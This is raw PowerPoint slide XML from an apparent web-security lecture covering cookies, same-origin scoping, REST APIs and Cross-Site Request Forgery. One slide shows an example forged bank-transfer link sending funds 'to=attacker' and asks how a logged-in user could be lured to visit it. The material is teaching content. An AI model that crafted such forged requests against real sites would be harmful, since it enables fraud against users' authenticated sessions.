                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22AE0B21-47FA-27C1-9489-975397961A0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="16081205" cy="5182179"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="578" name="Rounded Rectangle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC29FA3E-92B9-CA0F-FD84-901BEFBF0269}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1305206" y="4453394"/>
              <a:ext cx="7783760" cy="480751"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18545"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="579" name="Rounded Rectangle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D559EA-6559-5EF6-0276-A06497373620}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9152835" y="4453394"/>
              <a:ext cx="7064267" cy="480751"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18545"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFCD3F36-7567-5310-7F2A-AAE36988CB27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20421058" y="11837242"/>
            <a:ext cx="79057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a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DBD92C-C8C7-2F1E-B76A-A9159D86CF36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097859" y="8811070"/>
            <a:ext cx="12188282" cy="2285241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solid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wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="586493" indent="-586493" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4750"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>extremely common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use of cookies is to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>track users who have already authenticated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3172538626"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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 grpId="0" animBg="1" advAuto="0"/>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1" name="Shape 691"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11657458" y="7572509"/>
            <a:ext cx="9071274" cy="1721584"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11065"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="635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692" name="Shape 692"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="606352"/>
            <a:ext cx="15609094" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Cookies and SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="693" name="Screen Shot 2014-02-18 at 3.27.40 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="29040" b="65659"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4444416" y="3156220"/>
            <a:ext cx="17640133" cy="514639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Shape 694"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454547" y="5327795"/>
            <a:ext cx="3637475" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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rPr dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Shape 695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5383966" y="4239490"/>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696" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780477" y="5183034"/>
            <a:ext cx="4985614" cy="6276294"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6555"/>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697" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933831" y="9367899"/>
            <a:ext cx="2678907" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9840"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>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p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Private)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6273283" y="8111887"/>
            <a:ext cx="1" cy="1150827"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="701" name="Group 701"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8014781" y="3922581"/>
            <a:ext cx="2356988" cy="2678908"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2356986" cy="2678906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="699" name="Shape 699"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2594858"/>
              <a:ext cx="2356987" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1524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700" name="Shape 700"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2279684" y="0"/>
              <a:ext cx="1" cy="2678907"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Shape 702"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11927525" y="5408040"/>
            <a:ext cx="8531140" cy="708687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pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>Store “en” under the key “edition”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>This value is no good as of Wed Feb 18…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>This value should only be readable by any domain ending in </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>.zdnet.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>This should be available to any resource within a subdirectory of </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>Send the cookie with any future requests to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;domain&gt;/&lt;path&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Shape 703"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6616231" y="3154405"/>
            <a:ext cx="1902227" cy="480752"/>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04" name="Shape 704"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565137" y="3154405"/>
            <a:ext cx="6925285" cy="480752"/>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05" name="Shape 705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16895768" y="3154405"/>
            <a:ext cx="3408655" cy="480752"/>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706" name="Shape 706"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15524666" y="3154405"/>
            <a:ext cx="1334154" cy="480752"/>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spc="-32">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707" name="Shape 707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14527032" y="4416349"/>
            <a:ext cx="333212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b="1" u="sng">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Semantics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41145944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691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="5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URLs with side effects"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387452" y="726190"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>URLs with side effects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="GET requests often have side effects on server state…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3950946" y="5151054"/>
            <a:ext cx="16482108" cy="6603917"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>GET requests often have </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>side effects on server state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Even though they are not supposed to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>What happens if </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>user is logged in</a:t>
            </a:r>
            <a:r>
              <a:t> with an active session cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>request is issued for the above link?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>How could you get a user to visit a link?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="http://bank.com/transfer.cgi?amt=9999&amp;to=attacker"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892165" y="3492318"/>
            <a:ext cx="16599670" cy="828676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200">
              <a:alpha val="28000"/>
            </a:srgb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4400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bank.com/transfer.cgi?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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4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4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4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6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0"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E7676-E733-60CC-87DA-F555AB620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0D825-7362-88C4-80DB-B1FE1F5FA73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182029" y="592542"/>
            <a:ext cx="22168625" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0"/>
              <a:t>RESTful APIs: Beyond browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE77A799-D913-3B8D-D61B-A61E35F64192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131266" y="3170896"/>
            <a:ext cx="15609095" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Representational State Transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST-compliant Web services allow requesting systems to access and manipulate Web resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basically: A way to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>map web requests onto a remote services API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for access resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> identifies the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (GET, PUT, POST, DELETE) indicates the operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For collections, these are List, Replace, Create, Delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For items, these are Retrieve, Replace, (unused), Delete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1AFE227-B005-D44C-F8B8-82E54B0DC529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410790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Exploiting URLs with side-effects"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397619" y="503906"/>
            <a:ext cx="21588761" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="432308">
              <a:defRPr sz="8288"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11200" dirty="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr sz="11200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="649" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5443897" y="4706641"/>
            <a:ext cx="2561093" cy="3205220"/>
            <a:chOff x="0" y="452437"/>
            <a:chExt cx="2561092" cy="3205219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="647" name="Browser"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="978750"/>
              <a:ext cx="2561093" cy="2678907"/>
            </a:xfrm>
            <a:prstGeom prst="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3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="648" name="Client"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1280546" y="45243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r>
                <a:t>Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7976813" y="3536300"/>
            <a:ext cx="9402947" cy="2090109"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="152400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
